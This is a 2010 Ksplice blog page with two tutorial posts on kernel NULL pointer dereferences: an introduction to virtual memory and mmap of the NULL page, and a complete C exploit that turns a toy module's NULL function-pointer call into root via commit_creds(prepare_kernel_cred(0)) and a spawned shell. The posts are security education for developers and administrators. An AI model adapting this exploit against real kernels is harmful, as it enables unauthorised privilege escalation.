Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.

nullderef.ko

In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
  __attribute__((regparm(3)));
typedef int (*commit_creds_t)(struct cred *new)
  __attribute__((regparm(3)));

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
        commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.

~nelhage

One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;
}

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.

mmap(2)

One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
prot
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
           MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  }
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;
}

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!

~nelhage

About

Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

Search

Archives
« April 2014
SunMonTueWedThuFriSat
  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
   
       
Today